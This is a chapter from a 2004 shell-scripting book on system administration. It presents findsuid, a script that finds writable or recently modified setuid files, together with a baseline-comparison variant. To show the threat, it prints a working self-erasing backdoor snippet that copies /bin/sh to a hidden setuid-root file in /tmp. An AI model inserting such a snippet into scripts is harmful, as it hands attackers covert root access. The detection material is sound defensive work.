Chapter 6: System Administration: System Maintenance


The most common use of shell scripts is to help with Unix or Linux system administration. There's an obvious reason for this, of course: Administrators are often the most knowledgeable Unix users on the system, and they also are responsible for ensuring that things run smoothly and without a glitch. But there might be an additional reason for the emphasis on shell scripts within the system administration world. My theory? That system administrators and other power users are the people most likely to be having fun with their system, and shell scripts are quite fun to develop within the Unix environment!

And with that, let's continue exploring how shell scripts can help you with system administration tasks.

#49 Tracking Set User ID Applications

There are quite a few ways that ruffians and digital delinquents can break into a Unix system, whether they have an account or not, but few ways are as easy for them as finding an improperly protected setuid or setgid command.

In a shell script, for example, adding a few lines of code can create a setuid shell for the bad guy once the code is invoked by the unsuspecting root user:

    if [ "${USER:-$LOGNAME}" = "root" ] ; then # REMOVEME
      cp /bin/sh /tmp/.rootshell               # REMOVEME
      chown root /tmp/.rootshell               # REMOVEME
      chmod -f 4777 /tmp/.rootshell            # REMOVEME
      grep -v "# REMOVEME" $0 > /tmp/junk      # REMOVEME
      mv /tmp/junk $0                          # REMOVEME
    fi                                         # REMOVEME

Once this script is run by root, a shell is surreptitiously copied into /tmp as .rootshell and is made setuid root for the cracker to exploit at will. Then the script causes itself to be rewritten to remove the conditional code (hence the # REMOVEME at the end of each line), leaving essentially no trace of what the cracker did.

The code snippet just shown would also be exploitable in any script or command that runs with an effective user ID of root; hence the critical need to ensure that you know and approve of all setuid root commands on your system. Of course, you should never have scripts with any sort of setuid or setgid permission for just this reason, but it's still smart to keep an eye on things.

The Code

    #!/bin/sh

    # findsuid - Checks all SUID files or programs to see if they're writeable,
    #   and outputs the matches in a friendly and useful format.

    mtime="7"       # how far back (in days) to check for modified cmds
    verbose=0       # by default, let's be quiet about things

    if [ "$1" = "-v" ] ; then
      verbose=1
    fi

    # "-perm -4000" (setuid bit set) is the POSIX spelling; current GNU find
    # rejects the older "+4000" form
    for match in $(find / -type f -perm -4000 -print)
    do
      if [ -x "$match" ] ; then

        # field 3 of "ls -ld" is the owner; columns 5-10 are the group/other bits
        owner="$(ls -ld "$match" | awk '{print $3}')"
        perms="$(ls -ld "$match" | cut -c5-10 | grep 'w')"

        if [ ! -z "$perms" ] ; then
          echo "**** $match (writeable and setuid $owner)"
        elif [ ! -z "$(find "$match" -mtime -$mtime -print)" ] ; then
          echo "**** $match (modified within $mtime days and setuid $owner)"
        elif [ $verbose -eq 1 ] ; then
          # fields 6-8 of "ls -ld" are the modification month, day and time/year
          lastmod="$(ls -ld "$match" | awk '{print $6, $7, $8}')"
          echo "     $match (setuid $owner, last modified $lastmod)"
        fi
      fi
    done

    exit 0

How It Works

This script checks all setuid commands on the system to see if they're group- or world-writable and whether they've been modified in the last $mtime days.
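Knowing and approving every setuid command is easier when you keep a reviewed baseline and report only what changed. The following is an added example, not the book's script: suid_inventory and suid_report are names chosen here, the search is limited to a directory you pass in, and filenames containing spaces are handled (the for-loop in findsuid splits on them).

```shell
#!/bin/sh
# suid_baseline.sh - inventory setuid/setgid files below a directory and
# compare them with an approved baseline, so that a setuid program that
# appears, changes owner or changes mode is reported. Added example, not
# the book's code; suid_inventory and suid_report are names chosen here.

# suid_inventory DIR: print "mode owner path" for every setuid or setgid
# regular file below DIR, one per line, sorted for later use with comm.
# "-perm -4000" is the POSIX form (GNU find rejects the older "+4000"),
# and paths are read line by line so names containing spaces survive.
suid_inventory() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null |
    while IFS= read -r f; do
        # ls -ld: "-rwsr-xr-x 1 owner group size date name"; keep fields 1 and 3
        set -- $(ls -ld "$f")
        printf '%s %s %s\n' "$1" "$3" "$f"
    done | LC_ALL=C sort
}

# suid_report BASELINE DIR: print every inventory line of DIR that is not
# in BASELINE (a reviewed file written earlier by suid_inventory), flagging
# group- or world-writable entries with "****" the way findsuid does.
# Returns 0 when nothing is new, 1 otherwise.
suid_report() {
    now="${TMPDIR:-/tmp}/suid_now.$$"
    suid_inventory "$2" > "$now"
    new=$(LC_ALL=C comm -13 "$1" "$now")     # lines only in the current set
    rm -f "$now"
    [ -n "$new" ] || return 0
    printf '%s\n' "$new" | while read -r mode owner path; do
        case "$mode" in
            ?????w*|????????w*) flag='****' ;;   # 'w' in the group or other triad
            *)                  flag='    ' ;;
        esac
        printf '%s %s (setuid/setgid %s, mode %s)\n' "$flag" "$path" "$owner" "$mode"
    done
    return 1
}
```

Take the baseline once with `suid_inventory / > /etc/suid.baseline`, review it by hand, and then run `suid_report /etc/suid.baseline /` from cron; a non-zero exit means something setuid appeared or changed since the review.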

Running the Script

This script has one optional argument: -v produces a verbose output that lists every setuid program encountered by the script. This script should probably be run as root, but it can be run as any user that has access permission to the key directories.

The Results

I've dropped a "hacked" script somewhere in the system. Let's see if findsuid can find it:

    $ findsuid
    **** /var/tmp/.sneaky/editme (writeable and setuid root)

There it is!

    $ ls -l /var/tmp/.sneaky/editme
    -rwsrwxrwx  1 root  wheel  25988 Jul 13 11:50 /var/tmp/.sneaky/editme

A huge hole just waiting for someone to exploit.




Wicked Cool Shell Scripts. 101 Scripts for Linux, Mac OS X, and Unix Systems
ISBN: 1593270127
Year: 2004
Pages: 150
Authors: Dave Taylor